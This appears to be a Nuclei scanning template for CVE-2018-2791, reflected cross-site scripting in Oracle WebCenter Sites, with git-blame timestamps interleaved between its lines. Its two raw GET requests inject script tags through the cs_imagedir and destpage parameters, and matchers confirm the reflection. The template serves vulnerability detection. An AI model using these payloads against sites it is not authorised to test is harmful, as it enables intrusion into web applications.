2021-01-02 05:00:39 +00:00
id : CVE-2018-2791
2020-04-08 11:37:09 +00:00
info :
2021-11-05 23:48:10 +00:00
name : Oracle WebCenter Sites Multiple XSS
2021-11-06 07:21:30 +00:00
author : madrobot,leovalcante
2021-09-10 11:26:40 +00:00
severity : high
2021-11-05 23:48:10 +00:00
description : Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware.
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
cvss-score : 8.20
cve-id : CVE-2018-2791
reference :
- http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
- http://www.securitytracker.com/id/1040695
- http://www.securityfocus.com/bid/103800
- https://www.exploit-db.com/exploits/44752/
2021-11-05 23:48:10 +00:00
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
2021-11-06 07:21:30 +00:00
tags : cve,cve2018,oracle,xss,wcs
2021-02-05 19:44:41 +00:00
2020-04-08 11:37:09 +00:00
requests :
2021-11-05 23:48:10 +00:00
- raw :
- |
2021-11-06 07:21:30 +00:00
GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
2021-11-05 23:48:10 +00:00
Host : {{BaseURL}}
2021-11-06 07:21:30 +00:00
2021-11-05 23:48:10 +00:00
- |
2021-11-06 07:21:30 +00:00
GET /cs/Satellite?destpage="<h1xxx"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1
2021-11-05 23:48:10 +00:00
Host : {{BaseURL}}
2021-11-06 07:21:30 +00:00
stop-at-first-match : true
matchers-condition : or
2020-04-08 11:37:09 +00:00
matchers :
- type : word
part : body
2021-11-06 07:21:30 +00:00
words :
- '<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif'
2020-12-13 19:24:23 +00:00
- type : word
2021-11-06 07:21:30 +00:00
part : body
2020-12-13 19:24:23 +00:00
words :
2021-11-06 07:21:30 +00:00
- '<script>alert(24)</script>'
- 'Missing translation key'
condition : and